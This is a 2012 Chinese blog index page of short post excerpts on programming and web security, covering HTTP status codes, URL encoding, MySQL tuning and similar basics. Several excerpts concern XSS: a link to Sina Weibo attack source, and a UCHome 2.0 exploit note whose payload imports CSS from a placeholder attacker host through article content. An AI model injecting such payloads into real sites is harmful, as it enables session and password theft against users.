不灭的焱

革命尚未成功,同志仍须努力

作者:php-note.com  发布于:2012-06-07 23:52  分类:编程基础/Web安全 

人月指一个项目完全做完需要的工作量,按照一个人干多少个月来算,项目最终进行成本核算时都用的到,如果一个项目你们3个人,干5个月才能干完,那么这个项目就需要3X5=15个人月,这样你们在做计划的时候可以根据人员的安排、项目的进度来进行相关的预算了。

作者:php-note.com  发布于:2012-06-05 15:02  分类:编程基础/Web安全 

HTTP状态码

当浏览者访问一个网页时,浏览者的浏览器会向网页所在服务器发出请求。当浏览器接收并显示网页前,此网页所在的服务器会返回一个包含HTTP状态码的信息头(server header)用以响应浏览器的请求。

HTTP状态码的英文为 HTTP Status Code

下面是常见的HTTP状态码:

  • 200 - 请求成功
  • 301 - 资源(网页等)被永久转移到其它URL
  • 404 - 请求的资源(网页等)不存在
  • 500 - 内部服务器错误
作者:php-note.com  发布于:2012-06-01 00:17  分类:编程基础/Web安全 

url编码是一种浏览器用来打包表单输入的格式。浏览器从表单中获取所有的name和其中的值 ,将它们以name/value参数编码(移去那些不能传送的字符,将数据排行等等)作为URL的一部分或者分离地发给服务器。

作者:php-note.com  发布于:2012-05-30 17:59  分类:编程基础/Web安全 

CSV其实就是 COMMA SEPARATED VALUE 的缩写,出现在档案总管中的档案类型是「逗号分格」,依计算机原来的设定,如果直接点选该档案,计算机将以EXCEL的模式开启该档案。

作者:php-note.com  发布于:2012-05-30 10:16  分类:编程基础/Web安全 

新浪微博XSS攻击源代码下载(2012.06.28_sina_XSS.txt)

作者:php-note.com  发布于:2012-05-30 01:56  分类:编程基础/Web安全 

0x01. XSS获取明文密码的多种方式

我已经感受到Web潮流带来的巨大革新,尤其是最近HTML5越来越火。浏览器们在客户端瓜分着这个Web OS,只要是对用户体验好的功能,浏览器之间就会互相学习,然后去实现,但是实现总是存在一些差异,有些差异是用户体验上的,有些则可能带来安全问题。

作者:php-note.com  发布于:2012-05-29 23:04  分类:编程基础/Web安全 

发布时间2010-09-03

影响版本uchome 2.0

漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

测试方法

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

作者:php-note.com  发布于:2012-05-29 23:03  分类:编程基础/Web安全 

利用条件:开启注册&&开启投稿

方法 :注册会员 -> 发表文章:内容输入

<style>@import 'http://xxx.com/xss.css';</style>
作者:php-note.com  发布于:2012-05-27 23:19  分类:编程基础/Web安全 

作者:php-note.com  发布于:2012-05-27 09:46  分类:编程基础/Web安全 

1、选取最适用的字段属性

2、使用连接(JOIN)来代替子查询(Sub-Queries)

3、使用联合(UNION)来代替手动创建的临时表

4、事务

5、锁定表

6、使用外键

7、使用索引

8、优化的查询语句